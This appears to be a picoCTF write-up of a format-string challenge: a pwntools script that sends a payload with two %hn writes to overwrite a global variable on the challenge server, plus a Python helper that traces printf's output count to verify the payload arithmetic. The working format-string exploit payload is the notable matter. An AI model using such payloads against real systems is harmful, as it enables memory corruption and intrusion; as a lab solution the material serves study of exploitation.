Format string vulnerability used to write to a global variable. The payload uses %hn twice, each time writing 16 bits to a location in memory.
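from pwn import *

r = remote('rhea.picoctf.net', 54890)
s = r.recvuntil(b'say?')  # wait for the prompt before sending
# %26464d plus the ',' after the d prints 26465 = 0x6761 characters; %20$hn stores that count
# 1285 more characters (%1281d plus AAAA) bring the count to 27750 = 0x6c66; %19$hn stores that
# the two 8-byte little-endian values after the format text are 0x404060 and 0x404062, the targets of the two %hn writes
r.sendline(b'%26464d,%20$hn%1281dAAAA%19$hnx,%22$llx,\x60\x40\x40\x00\x00\x00\x00\x00\x62\x40\x40\x00\x00\x00\x00\x00DEFGHIJKLMNOPQRSTUVWXYZ')
r.interactive()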
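
The arithmetic in the script's comments can be checked by walking the format string the way printf counts its output. This is an added example, not part of the original script: `trace_n_writes`, `DIRECTIVE` and `N_BITS` are hypothetical names, and it assumes LP64 sizes and that each padded conversion prints exactly its width.

```python
import re

# Format-string part of the payload in the script (the bytes before the two
# packed addresses), copied from the page.
FMT = b'%26464d,%20$hn%1281dAAAA%19$hnx,%22$llx,'

# One printf directive: optional "N$" position, optional width, optional
# length modifier, conversion character.
DIRECTIVE = re.compile(rb'%(?:(\d+)\$)?(\d+)?(hh|h|ll|l)?([diuxXcsn%])')

# Bits stored by %n for each length modifier (assumes an LP64 target).
N_BITS = {b'hh': 8, b'h': 16, None: 32, b'l': 64, b'll': 64}


def trace_n_writes(fmt):
    """Return [(arg_index, bits, value)] for every %n-family write in fmt.

    Assumption: a padded conversion such as %26464d prints exactly its width,
    which holds whenever the converted value is shorter than the width.
    Tracing stops at the first conversion whose output length is unknown.
    """
    count, pos, writes = 0, 0, []
    while pos < len(fmt):
        m = DIRECTIVE.match(fmt, pos)
        if m is None:              # literal byte: printed as-is
            count += 1
            pos += 1
            continue
        arg, width, length, conv = m.groups()
        pos = m.end()
        if conv == b'%':           # "%%" prints one '%'
            count += 1
        elif conv == b'n':         # store the running count, truncated to size
            bits = N_BITS[length]
            index = int(arg) if arg else None   # None: next sequential argument
            writes.append((index, bits, count % (1 << bits)))
        elif width is not None:
            count += int(width)
        else:
            break                  # e.g. %22$llx: length depends on memory
    return writes


if __name__ == '__main__':
    for index, bits, value in trace_n_writes(FMT):
        print(f'argument {index}: {bits}-bit store of {value} ({value:#x})')
```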